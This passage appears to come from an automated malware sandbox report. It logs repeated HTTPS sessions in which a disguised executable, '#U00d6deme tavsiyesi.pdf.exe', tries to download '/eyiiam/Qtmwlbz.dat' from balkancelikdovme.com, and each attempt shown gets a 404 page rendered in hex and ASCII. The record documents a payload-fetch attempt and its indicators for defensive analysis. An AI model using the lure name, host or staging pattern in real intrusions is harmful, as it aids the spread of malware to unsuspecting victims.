      2024-12-16 13:24:59 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      17192.168.2.549756185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:01 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:01 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:01 GMT
      vary: User-Agent
      2024-12-16 13:25:01 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      18192.168.2.549762185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:03 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:03 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:03 GMT
      vary: User-Agent
      2024-12-16 13:25:03 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      19192.168.2.549767185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:04 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:05 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:05 GMT
      vary: User-Agent
      2024-12-16 13:25:05 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      20192.168.2.549773185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:06 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:07 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:07 GMT
      vary: User-Agent
      2024-12-16 13:25:07 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      21192.168.2.549776185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:08 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:09 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:08 GMT
      vary: User-Agent
      2024-12-16 13:25:09 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      22192.168.2.549781185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:10 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:10 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:10 GMT
      vary: User-Agent
      2024-12-16 13:25:10 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      23192.168.2.549787185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:12 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:12 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:12 GMT
      vary: User-Agent
      2024-12-16 13:25:12 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      24192.168.2.549793185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:14 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:14 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:14 GMT
      vary: User-Agent
      2024-12-16 13:25:14 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      25192.168.2.549799185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:16 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:16 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:16 GMT
      vary: User-Agent
      2024-12-16 13:25:16 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      26192.168.2.549804185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:17 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:18 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:18 GMT
      vary: User-Agent
      2024-12-16 13:25:18 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      27192.168.2.549809185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:20 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:20 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:20 GMT
      vary: User-Agent
      2024-12-16 13:25:20 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      28192.168.2.549814185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:21 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:22 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:22 GMT
      vary: User-Agent
      2024-12-16 13:25:22 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      29192.168.2.549818185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:23 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:24 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:24 GMT
      vary: User-Agent
      2024-12-16 13:25:24 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      30192.168.2.549825185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:25 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:26 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:25 GMT
      vary: User-Agent
